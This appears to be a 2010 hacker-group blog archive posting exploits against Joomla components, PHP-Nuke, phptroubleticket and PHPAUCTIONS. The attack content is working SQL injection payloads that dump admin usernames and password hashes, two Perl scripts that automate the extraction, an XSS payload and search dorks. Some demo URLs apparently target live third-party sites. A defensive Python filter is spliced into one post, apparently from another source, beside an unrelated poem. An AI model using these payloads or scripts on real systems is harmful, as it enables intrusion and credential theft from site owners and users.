Tuesday, 09 March 2010

Joomla Component com_hezacontent SQL injection Vulnerability (id)

[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage : http://www.indonesiancoder.com
[~] Date : 9 March, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]


[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--


[ d3m0 ]

http://bbh.coadesign.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

and so on ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9

[ NOTE ]

[+] Rawk !
[+] gonzhack : hurry up and get over here, dummy !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f

Sunday, 07 March 2010

PHPAUCTIONS XSS Vulnerabilities

#############################################################################################################
## Title : PHPAUCTIONS XSS Vulnerabilities ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] INFO
[+] Name : PHPAUCTIONS
[+] Vendor : http://phpauctions.info/
[+] Vulnerability : XSS
[+] Dork : "Dork Just for newbie"
#############################################################################################################

[ Vulnerable File ]

[+] http://127.0.0.1/[senot]/feedback.php?id=[INDONESIANCODER]


[ DEMO ]

[+] http://phpauctions.info/demo/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert%28123456789%29%3C/script%3E&faction=show

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you

[ NOTES ]

[+] kaMtiEz for ayy . . u will be mine
[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )

Thursday, 04 March 2010

PHPNUKE CMS ( Survey&poll ) SQLi vuln

#############################################################################################################
## Title : PHPNUKE CMS ( Survey&poll ) SQLi Vulner ##
## Author : SENOT (selalungantuk_exe@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Thursday 04 March, 2010 ##
## Location : - INDONESIA - ##
#############################################################################################################
[+] CMS INFO
[+] Name : PHPNUKE CMS
[+] Vendor : http://phpnuke.org/
[+] Download : http://phpnuke.org/modules.php?name=Downloads
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################

[ Vulnerable File ]

[+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]

[ XpL ]

[+] +and+1=2+union+select+1,version(),3,4--

[ DEMO ]

[+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--
[+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you

[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )

Tuesday, 02 March 2010

my falling star


when I am alone ...
did you ever understand ..
all my friends have gone ..
and you are not here either ...


nights like this ..
truly mean nothing at all ..
the moon and the stars are weary too ..
and the sky is so very dark ...


until I came to my senses ..
you passed right in front of me ...
falling star, is that you ,,
don't you let me down ..

there is nothing I can do
but wait and see ..
I will wait for you until you appear before me !
O my falling star !

I am enchanted at the sight of you ..
your beauty astonishes my mind .
I want to have you ..
someday you will be mine ..
it just takes time .. :D


EOF

Monday, 01 March 2010

phptroubleticket SQL injection (id)

#############################################################################################################
## phptroubleticket SQL injection (id) ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 1 March, 2010 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phptroubleticket.org/
[+] Download : http://www.phptroubleticket.org/downloads.html
[+] version : 2.0 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/vedi_faq.php?id=[INDONESIANCODER]


[ XpL ]

/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--


[ DEMO ]

http://ww2.unime.it/ingegneria/new/assistenza/vedi_faq.php?id=666/**/union/**/all/**/select/**/1,concat_ws(0x3a,email,password)kaMtiEz,3,4/**/from/**/utenti--

[ FIX ]

dunno :">
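
Added example (not part of the original advisory, and not code from any of the affected projects): every parameter these advisories inject into (id, pollID, treeId) is a numeric identifier, so a request filter or log check can reject anything that is not a plain integer and label what it finds. The sketch below also undoes nested and repeated URL encoding and strips /**/ comment padding before matching; the host app.example, the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Parameters the advisories on this page inject into; each should carry a plain integer.
NUMERIC_PARAMS = {"id", "pollid", "treeid"}
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
SCRIPT_RE = re.compile(r"<\s*script\b", re.I)

def normalise(value, max_rounds=3):
    """Undo repeated URL encoding, then replace /* */ comments and '+' padding with spaces."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip()

def iter_params(query, depth=0):
    """Yield (name, value) pairs, descending into values that wrap another URL (go=...)."""
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield name, value
        if "?" in value and depth < 2:
            yield from iter_params(value.split("?", 1)[1], depth + 1)

def inspect(url):
    """Return (param, verdict) for every numeric parameter that is not a plain integer."""
    findings = []
    for name, raw in iter_params(urlsplit(url).query):
        if name.lower() not in NUMERIC_PARAMS or re.fullmatch(r"[0-9]{1,10}", raw):
            continue
        value = normalise(raw)
        verdict = ("sqli-union" if UNION_RE.search(value) else
                   "xss-script" if SCRIPT_RE.search(value) else "non-numeric")
        findings.append((name, verdict))
    return findings

# Constructed sample requests modelled on the request shapes shown on this page.
SAMPLES = [
    "http://app.example/index.php?option=com_hezacontent&view=item&id=42",
    "http://app.example/vedi_faq.php?id=666/**/union/**/all/**/select/**/1,2,3,4--",
    "http://app.example/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults"
    "%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--",
    "http://app.example/feedback.php?id=29/%3E%22%3E%3Cscript%3Ealert%281%29%3C/script%3E",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect(url) or "clean", url[:60])
```

The durable fix stays in the application: cast these parameters to integers or bind them in prepared statements, and HTML-encode anything echoed back into the page.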


#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Ayy : U will be owned ;]
[+] Don Tukulesto : where have you gone, heyyyyy
[+] IBL13Z : keep on studying, okay ;]

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..

Wednesday, 24 February 2010

Joomla Component com_hdflvplayer SQL injection exploit - (id)

#!/usr/bin/perl -w

###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}

##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################

Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId)

#!/usr/bin/perl -w

###########################################################################################
#[~] Joomla Component com_joaktree SQL injection Exploit vulnerability - (treeId)
#[~] Author : kaMtiEz (kamzcrew@yahoo.com)
#[~] Homepage : http://www.indonesiancoder.com
#[~] Date : 20 February, 2010
############################################################################################
#
#[ Software Information ]
#
#[+] Vendor : http://joaktree.com/
#[+] Download : http://joaktree.com/index.php/en/joaktree/downloads
#[+] version : 1.1.1 or lower maybe also affected
#[+] Vulnerability : SQL injection
#[+] Dork : inurl:"com_joaktree"
#[+] Type : Free
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################

print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_joaktree SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";

use LWP::UserAgent;

print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);

$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$Pathloader="version()";

$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$arianom = $IBL13Z . "/index.php?option=com_joaktree&view=joaktree&treeId=-1+union+all+select+1,2,3,".$Pathloader.",5,".$kaMtiEz.",7,8,9,10,11,12,13,14,15,16+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}

##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################



 
